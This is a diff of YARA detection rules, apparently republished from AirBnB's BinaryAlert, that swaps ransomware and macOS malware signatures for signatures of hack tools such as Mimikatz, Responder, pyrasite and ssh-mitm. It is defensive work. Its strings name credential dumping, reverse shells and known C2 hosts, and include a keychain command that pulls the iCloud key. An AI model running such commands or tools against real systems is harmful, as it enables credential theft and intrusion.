-		modified = "2017-08-11"
-		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_HDDCryptorA.yara#L1-L23"
+		description = "This program decrypts / extracts all authorization tokens on macOS / OS X / OSX."
+		author = "@mimeframe"
+		id = "2dc01ff3-4c4a-548d-b2f0-b36897ad6a5c"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/manwhoami/MMeTokenDecrypt"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_mmetokendecrypt.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "498bdcfb93d13fecaf92e96f77063abf"
-		logic_hash = "24c113be31c3df7b544a5789bf055f77471d450c07f0a6729a715e2a82b4d1f0"
+		logic_hash = "ccfedfbff0c6eefe41e80fe488d4cae928a33e7b86019c6ec54d1c9005b35147"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
 
 	strings:
-		$u1 = "You are Hacked" fullword ascii wide
-		$u2 = "Your H.D.D Encrypted , Contact Us For Decryption Key" nocase ascii wide
-		$u3 = "start hard drive encryption..." ascii wide
-		$u4 = "Your hard drive is securely encrypted" ascii wide
-		$g1 = "Wipe All Passwords?" ascii wide
-		$g2 = "SYSTEM\\CurrentControlSet\\Services\\dcrypt\\config" ascii wide
-		$g3 = "DiskCryptor" ascii wide
-		$g4 = "dcinst.exe" fullword ascii wide
-		$g5 = "dcrypt.exe" fullword ascii wide
-		$g6 = "you can only use AES to encrypt the boot partition!" ascii wide
+		$a1 = "security find-generic-password -ws 'iCloud'" wide ascii
+		$a2 = "ERROR getting iCloud Decryption Key" wide ascii
+		$a3 = "Could not find MMeTokenFile. You can specify the file manually." wide ascii
+		$a4 = "Decrypting token plist ->" wide ascii
+		$a5 = "Successfully decrypted token plist!" wide ascii
 
 	condition:
-		2 of ( $u* ) or 4 of ( $g* )
+		3 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Wannacry
+rule BINARYALERT_Hacktool_Multi_Jtesta_Ssh_Mitm
 {
 	meta:
-		description = "wannacry ransomware for windows"
+		description = "intercepts ssh connections to capture credentials"
 		author = "@fusionrace"
-		id = "0269b6f4-a47d-5683-aaaa-2141ca7f04dc"
+		id = "fa8362e2-83d3-5830-8952-502684ad66f9"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_wannacry.yara#L1-L23"
+		reference = "https://github.com/jtesta/ssh-mitm"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_jtesta_ssh_mitm.yara#L1-L12"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "4fef5e34143e646dbf9907c4374276f5"
-		logic_hash = "c01f460c0f5e39cde5f553c966553fe693e5203cb020b8f571eac6fc193fa91b"
-		score = 75
-		quality = 50
+		logic_hash = "1d19c83f7d648a0d30074debcd76ff0faf72afa6722251661f8640abdc12a2a9"
+		score = 50
+		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "msg/m_chinese" wide ascii
-		$a2 = ".wnry" wide ascii
-		$a3 = "attrib +h" wide ascii
-		$b1 = "WNcry@2ol7" wide ascii
-		$b2 = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" wide ascii
-		$b3 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" wide ascii
-		$b4 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" wide ascii
-		$b5 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" wide ascii
+		$a1 = "INTERCEPTED PASSWORD:" wide ascii
+		$a2 = "more sshbuf problems." wide ascii
 
 	condition:
-		all of ( $a* ) or any of ( $b* )
+		all of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_3
+rule BINARYALERT_Hacktool_Multi_Responder_Py
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
+		description = "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server"
 		author = "@fusionrace"
-		id = "cbf06e62-abe8-54af-b4f4-624ba9233e4b"
+		id = "82699a67-8ba1-5535-9183-3c857e60134c"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara#L1-L13"
+		reference = "http://www.c0d3xpl0it.com/2017/02/compromising-domain-admin-in-internal-pentest.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_responder_py.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "4f21b394eb2dd0ebf416b018f438934fdc89cb896701d95b593477fc19abfe48"
+		logic_hash = "a99a806b7c578af1f2163583f957db13fa7269c7426666189d85bec2ac87ad4b"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "wevtutil cl Setup & wevtutil cl System" fullword wide
-		$s2 = "fsutil usn deletejournal /D %c:" fullword wide
+		$s1 = "Poison all requests with another IP address than Responder's one." fullword ascii wide
+		$s2 = "Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned." fullword ascii wide
+		$s3 = "Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network." fullword ascii wide
+		$s4 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
+		$s5 = "Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)" fullword ascii wide
+		$s6 = "31mOSX detected, -i mandatory option is missing" fullword ascii wide
+		$s7 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
 
 	condition:
 		any of them
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_Bitcoin
+rule BINARYALERT_Hacktool_Multi_Bloodhound_Owned
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE: Bitcoin"
+		description = "Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains"
 		author = "@fusionrace"
-		id = "82d6ecc5-7c90-5d50-90ff-f54f8d87685d"
+		id = "4d458339-6589-5094-8c23-1ad2baee19f1"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara#L1-L13"
+		reference = "https://github.com/porterhau5/BloodHound-Owned/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_bloodhound_owned.yara#L1-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "9a5e183aa8e1387e76d5df4e967943b730ba780b6758af3ef23e21bb9e4ce3a6"
+		logic_hash = "01ef15a3cd606c46dacb0f22477fe97f94e212a38af1cd5bdd7eb11efe8144dd"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" fullword wide
+		$s1 = "Find all owned Domain Admins" fullword ascii wide
+		$s2 = "Find Shortest Path from owned node to Domain Admins" fullword ascii wide
+		$s3 = "List all directly owned nodes" fullword ascii wide
+		$s4 = "Set owned and wave properties for a node" fullword ascii wide
+		$s5 = "Find spread of compromise for owned nodes in wave" fullword ascii wide
+		$s6 = "Show clusters of password reuse" fullword ascii wide
+		$s7 = "Something went wrong when creating SharesPasswordWith relationship" fullword ascii wide
+		$s8 = "reference doc of custom Cypher queries for BloodHound" fullword ascii wide
+		$s9 = "Created SharesPasswordWith relationship between" fullword ascii wide
+		$s10 = "Skipping finding spread of compromise due to" fullword ascii wide
 
 	condition:
-		$s1
+		any of them
 }
-rule BINARYALERT_Malware_Macos_Bella
+rule BINARYALERT_Hacktool_Multi_Ncc_ABPTTS
 {
 	meta:
-		description = "Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS."
+		description = "Allows for TCP tunneling over HTTP"
 		author = "@mimeframe"
-		id = "ca4ab508-8c97-5307-9aaf-db10cfd6ab35"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/Trietptm-on-Security/Bella"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_bella.yara#L1-L22"
+		id = "dd5f6316-9e51-5cc8-b293-dc33b09cc801"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/nccgroup/ABPTTS"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ncc_ABPTTS.yara#L1-L19"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b9c063b5ec8604958d3417ec8640da4314ebcf60ee55413a2f6fa8d138311614"
+		logic_hash = "09874b1d997ac193ad1afa0226f6fb22836c8720c0599d773b18072b92a3acc4"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Verified! [2FV Enabled] Account ->" wide ascii
-		$a2 = "There is no root shell to perform this command. See [rooter] manual entry." wide ascii
-		$a3 = "Attempt to escalate Bella to root through a variety of attack vectors." wide ascii
-		$a4 = "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." wide ascii
-		$b1 = "user_pass_phish" fullword wide ascii
-		$b2 = "bella_info" fullword wide ascii
-		$b3 = "get_root" fullword wide ascii
-		$c1 = "Please specify a bella server." wide ascii
-		$c2 = "What port should Bella connect on [Default is 4545]:" wide ascii
+		$s1 = "---===[[[ A Black Path Toward The Sun ]]]===---" ascii wide
+		$s2 = "https://vulnerableserver/EStatus/" ascii wide
+		$s3 = "Error: no ABPTTS forwarding URL was specified. This utility will now exit." ascii wide
+		$s4 = "tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq" fullword ascii wide
+		$s5 = "63688c4f211155c76f2948ba21ebaf83" fullword ascii wide
+		$s6 = "ABPTTSClient-log.txt" fullword ascii wide
 
 	condition:
-		any of ( $a* ) or all of ( $b* ) or all of ( $c* )
+		any of them
 }
-rule BINARYALERT_Malware_Macos_Neoneggplant_Eggshell
+rule BINARYALERT_Hacktool_Multi_Masscan
 {
 	meta:
-		description = "EggShell is an iOS and macOS post exploitation surveillance pentest tool written in Python."
+		description = "masscan is a performant port scanner, it produces results similar to nmap"
 		author = "@mimeframe"
-		id = "274a34cc-9403-50e6-aa64-683a41bc30e6"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/neoneggplant/EggShell"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_neoneggplant_eggshell.yara#L1-L24"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "34906db9398313ccb84e67bd98e94324c628aefe3efa6ba3cca2df042b42cbe7"
-		score = 50
-		quality = 80
-		tags = ""
-
-	strings:
-		$a1 = "Created By Lucas Jackson (@neoneggplant)" wide ascii
-		$a2 = "SET LHOST (Leave blank for" wide ascii
-		$a3 = "SET LPORT (Leave blank for" wide ascii
-		$b1 = "/tmp/.esplog" wide ascii
-		$b2 = "spGHbigdxMBJpbOCAr3rnS3inCdYQyZV" wide ascii
-		$b3 = "keylogclear" wide ascii
-		$b4 = "getpasscode" wide ascii
-		$c1 = "spGHbigdxMBJpbOCAr3rnS3inCdYQyZV" wide ascii
-		$c2 = "getfacebook" wide ascii
-		$c3 = "type is eggsu" wide ascii
-		$c4 = "rmpersistence" wide ascii
-
-	condition:
-		all of ( $a* ) or 3 of ( $b* ) or 3 of ( $c* )
-}
-rule BINARYALERT_Malware_Macos_Macspy : FILE
-{
-	meta:
-		description = "macSpy is a malware-as-a-service (MaaS) product advertised as the most sophisticated Mac spyware ever"
-		author = "AlienVault Labs"
-		id = "5f9a5ed5-a982-552c-a6df-326228eaf459"
+		id = "adb2bb07-2a1a-5eb5-8049-b3f8e6cba48a"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_macspy.yara#L3-L17"
+		reference = "https://github.com/robertdavidgraham/masscan"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_masscan.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "6c03e4a9bcb9afaedb7451a33c214ae4"
-		logic_hash = "f04648860c9602e43516113000908008847dacfbe189d79e13737bcd034b68a0"
+		logic_hash = "b35e481f73b1c1722056157f8348e2e06bb109c094b948fc6be2d9a7df070a7f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$header0 = {cf fa ed fe}
-		$header1 = {ce fa ed fe}
-		$header2 = {ca fe ba be}
-		$c1 = { 76 31 09 00 76 32 09 00 76 33 09 00 69 31 09 00 69 32 09 00 69 33 09 00 69 34 09 00 66 31 09 00 66 32 09 00 66 33 09 00 66 34 09 00 74 63 3A 00 }
+		$a1 = "EHLO masscan" fullword wide ascii
+		$a2 = "User-Agent: masscan/" wide ascii
+		$a3 = "/etc/masscan/masscan.conf" fullword wide ascii
+		$b1 = "nmap(%s): unsupported. This code will never do DNS lookups." wide ascii
+		$b2 = "nmap(%s): unsupported, we do timing WAY different than nmap" wide ascii
+		$b3 = "[hint] I've got some local priv escalation 0days that might work" wide ascii
+		$b4 = "[hint] VMware on Macintosh doesn't support masscan" wide ascii
 
 	condition:
-		($header0 at 0 or $header1 at 0 or $header2 at 0 ) and $c1
+		all of ( $a* ) or any of ( $b* )
 }
-rule BINARYALERT_Malware_Macos_Apt_Sofacy_Xagent
+rule BINARYALERT_Hacktool_Multi_Pyrasite_Py
 {
 	meta:
-		description = "sofacy xagent for macOS"
-		author = "@mimeframe"
-		id = "91bef771-2ef1-58f6-ae01-3bdde4cc003c"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://blog.malwarebytes.com/cybercrime/2017/03/two-new-mac-backdoors-discovered/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_apt_sofacy_xagent.yara#L3-L62"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "4fe4b9560e99e33dabca553e2eeee510"
-		logic_hash = "d4b1096e4aeb8382e5abf93d3ecf71cd6ae2ed7afbc9a38549a2fc2739539674"
-		score = 75
-		quality = 55
-		tags = ""
-
-	strings:
-		$a1 = "remoteShell" ascii wide
-		$a2 = "getInfoOSX" ascii wide
-		$a3 = "ftpUpload" ascii wide
-		$a4 = "startUploading" ascii wide
-		$a5 = "deleteFile:" ascii wide
-		$a6 = "executeShellCommand" ascii wide
-		$a7 = "getFirefoxPassword" ascii wide
-		$a8 = "generateRandomPathAndName" ascii wide
-		$a9 = "createCryptPacket" ascii wide
-		$a10 = "CameraShot" ascii wide
-		$a11 = "7Cryptor" ascii wide
-		$a12 = "8ICryptor" ascii wide
-		$a13 = "Keylogger" ascii wide
-		$a14 = "BootXLoader" ascii wide
-		$a15 = "InjectApp" ascii wide
-		$b1 = "/Project/XAgentOSX/" ascii wide
-		$b2 = "XLoader_OSX" fullword ascii wide
-		$b3 = "<span class='keylog_user_keys'>" ascii wide
-		$b4 = "<span class='keylog_process'>" ascii wide
-		$b5 = "<span class='keylog_spec_key'>" ascii wide
-		$b6 = "<font size=4 color=red><pre>Stop take screenshot</pre></font>" ascii wide
-		$c1 = "http://23.227.196.215/" ascii wide
-		$c2 = "http://apple-iclods.org/" ascii wide
-		$c3 = "http://apple-checker.org/" ascii wide
-		$c4 = "http://apple-uptoday.org/" ascii wide
-		$c5 = "http://apple-search.info" ascii wide
-		$d1 = "watch/?" fullword ascii wide
-		$d2 = "search/?" fullword ascii wide
-		$d3 = "find/?" fullword ascii wide
-		$d4 = "results/?" fullword ascii wide
-		$d5 = "open/?" fullword ascii wide
-		$d6 = "search/?" fullword ascii wide
-		$d7 = "close/?" fullword ascii wide
-		$e1 = "itwm=" fullword ascii wide
-		$e2 = "text=" fullword ascii wide
-		$e3 = "from=" fullword ascii wide
-		$e4 = "itwm=" fullword ascii wide
-		$e5 = "ags=" fullword ascii wide
-		$e6 = "btnG=" fullword ascii wide
-		$e7 = "oprnd=" fullword ascii wide
-		$e8 = "itwm=" fullword ascii wide
-		$e9 = "utm=" fullword ascii wide
-		$e10 = "channel=" fullword ascii wide
+		description = "A tool for injecting arbitrary code into running Python processes."
+		author = "@fusionrace"
+		id = "0acd0044-a41c-5e9e-bb94-301cd704cf9d"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/lmacken/pyrasite"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_pyrasite_py.yara#L1-L24"
+		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
+		logic_hash = "7f3f3df5bd5c1bee2d85ff97878ad36223ab743926a5f8f1c079b039f724abc9"
+		score = 75
+		quality = 80
+		tags = ""
+
+	strings:
+		$s1 = "WARNING: ptrace is disabled. Injection will not work." fullword ascii wide
+		$s2 = "A payload that connects to a given host:port and receives commands" fullword ascii wide
+		$s3 = "A reverse Python connection payload." fullword ascii wide
+		$s4 = "pyrasite - inject code into a running python process" fullword ascii wide
+		$s5 = "The ID of the process to inject code into" fullword ascii wide
+		$s6 = "This file is part of pyrasite." fullword ascii wide
+		$s7 = "https://github.com/lmacken/pyrasite" fullword ascii wide
+		$s8 = "Setup a communication socket with the process by injecting" fullword ascii wide
+		$s9 = "a reverse subshell and having it connect back to us." fullword ascii wide
+		$s10 = "Write out a reverse python connection payload with a custom port" fullword ascii wide
+		$s11 = "Wait for the injected payload to connect back to us" fullword ascii wide
+		$s12 = "PyrasiteIPC" fullword ascii wide
+		$s13 = "A reverse Python shell that behaves like Python interactive interpreter." fullword ascii wide
+		$s14 = "pyrasite cannot establish reverse" fullword ascii wide
 
 	condition:
-		BINARYALERT_Macho_PRIVATE and ( 5 of ( $a* ) or any of ( $b* ) or any of ( $c* ) or 4 of ( $d* ) or 5 of ( $e* ) )
+		any of them
 }
-rule BINARYALERT_Malware_Macos_Marten4N6_Evilosx
+rule BINARYALERT_Hacktool_Multi_Ntlmrelayx
 {
 	meta:
-		description = "EvilOSX is a pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX."
+		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "2b2e62ca-f95c-55c5-aaf6-985aab49dfbb"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/Marten4n6/EvilOSX"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_marten4n6_evilosx.yara#L1-L16"
+		id = "7e0bc28f-9cb7-5c09-aedc-d95af23454aa"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ntlmrelayx.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "3402ebf34fd507d0c317416bf77bb3d51b67c8b0f099ce68d15ade6a6a2e302a"
+		logic_hash = "0d5d2d38866eb243e1803c456944e887d9d3920c54b15fd658bf90831fd87bfa"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "icloud_phish_stop" fullword wide ascii
-		$a2 = "icloud_contacts" fullword wide ascii
-		$a3 = "itunes_backups" fullword wide ascii
-		$a4 = "chrome_passwords" fullword wide ascii
-		$a5 = "Starting EvilOSX..." wide ascii
+		$a1 = "Started interactive SMB client shell via TCP" wide ascii
+		$a2 = "Service Installed.. CONNECT!" wide ascii
+		$a3 = "Done dumping SAM hashes for host:" wide ascii
+		$a4 = "DA already added. Refusing to add another" wide ascii
+		$a5 = "Domain info dumped into lootdir!" wide ascii
 
 	condition:
-		4 of ( $a* )
+		any of ( $a* )
 }
-rule BINARYALERT_Malware_Macos_Proton_Rat_Generic
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Copywrite
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
-		author = "@mimeframe"
-		id = "75cfaaff-e8d7-5cd4-953b-7d2011139725"
+		description = "Mimikatz credential dump tool: Author copywrite"
+		author = "@fusionrace"
+		id = "bf7a52b5-c0af-5805-a2da-41ae3842e0c6"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://objective-see.com/blog/blog_0x1D.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_proton_rat_generic.yara#L3-L21"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_copywrite.yara#L1-L24"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "6a2d0c8b20efc3fa283176a4bc76d6fd"
-		logic_hash = "b7d8660320564cba1d8e2d53d1fdc75509140c7e87a572b27931c62201df2d22"
+		logic_hash = "f0e8a8b0c7398e7af06bd074eec0433265ba0e675bdbff354e59432c246b0b36"
 		score = 75
-		quality = 64
+		quality = 80
 		tags = ""
+		md5_1 = "0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8"
+		md5_2 = "0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b"
+		md5_3 = "0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143"
+		md5_4 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
+		md5_5 = "09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca"
+		md5_6 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
 
 	strings:
-		$a1 = "SRWebSocket" nocase wide ascii
-		$a2 = "SocketRocket" nocase wide ascii
-		$b1 = "SSH tunnel not launched" nocase wide ascii
-		$b2 = "SSH tunnel still running" nocase wide ascii
-		$b3 = "SSH tunnel already launched" nocase wide ascii
-		$b4 = "Entering interactive session." nocase wide ascii
+		$s1 = "Kiwi en C" fullword ascii wide
+		$s2 = "Benjamin DELPY `gentilkiwi`" fullword ascii wide
+		$s3 = "http://blog.gentilkiwi.com/mimikatz" fullword ascii wide
+		$s4 = "Build with love for POC only" fullword ascii wide
+		$s5 = "gentilkiwi (Benjamin DELPY)" fullword wide
+		$s6 = "KiwiSSP" fullword wide
+		$s7 = "Kiwi Security Support Provider" fullword wide
+		$s8 = "kiwi flavor !" fullword wide
 
 	condition:
-		BINARYALERT_Macho_PRIVATE and any of ( $a* ) and any of ( $b* )
+		any of them
 }
-rule BINARYALERT_Malware_Multi_Pupy_Rat
+rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Postexploitation : FILE
 {
 	meta:
-		description = "pupy - opensource cross platform rat and post-exploitation tool"
-		author = "@mimeframe"
-		id = "b26deb19-85b2-5d39-9ff2-0ab9017f3263"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/n1nj4sec/pupy"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_pupy_rat.yara#L1-L16"
+		description = "Detection of strings in the post-exploitation modules of Cobalt Strike"
+		author = "@javutin, @mimeframe"
+		id = "76c2a5ae-bc7c-50c7-8731-94c75912574f"
+		date = "2017-12-14"
+		modified = "2017-12-14"
+		reference = "https://www.cobaltstrike.com/support"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_postexploitation.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "bb5d1e7f2aea94dc41efe75690ae31409e8f6305aa6c4ec0cd46922ee8fb7241"
+		logic_hash = "1a89128a0f5774d1333be440d38128e29cb36f9818fa44e60482ef078078aca8"
 		score = 75
-		quality = 74
-		tags = ""
+		quality = 80
+		tags = "FILE"
 
 	strings:
-		$a1 = "dumping lsa secrets" nocase wide ascii
-		$a2 = "dumping cached domain passwords" nocase wide ascii
-		$a3 = "the keylogger is already started" nocase wide ascii
-		$a4 = "pupyutils.dns" wide ascii
-		$a5 = "pupwinutils.security" wide ascii
-		$a6 = "-PUPY_CONFIG_COMES_HERE-" wide ascii
+		$s1 = "\\devcenter\\aggressor\\external\\"
 
 	condition:
-		3 of ( $a* )
+		filesize > 10KB and filesize < 1000KB and all of ( $s* )
 }
-rule BINARYALERT_Malware_Multi_Vesche_Basicrat
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Files
 {
 	meta:
-		description = "cross-platform Python 2.x Remote Access Trojan (RAT)"
-		author = "@mimeframe"
-		id = "e07a684c-3a3d-5dd3-a540-2cc9a5a170dd"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/vesche/basicRAT"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_vesche_basicrat.yara#L1-L15"
+		description = "Mimikatz credential dump tool: Files"
+		author = "@fusionrace"
+		id = "ea4fd443-64dd-5466-8525-40c3a023e229"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_files.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1503ce9de4e721903058c77b305ba057052d654ff1875ea880f4319c3e525a29"
+		logic_hash = "50d23cda49ca559da2e504e53b46b58679ea8bc07c501ff7764a3d142598adc8"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$a1 = "HKCU Run registry key applied" wide ascii
-		$a2 = "HKCU Run registry key failed" wide ascii
-		$a3 = "Error, platform unsupported." wide ascii
-		$a4 = "Persistence successful," wide ascii
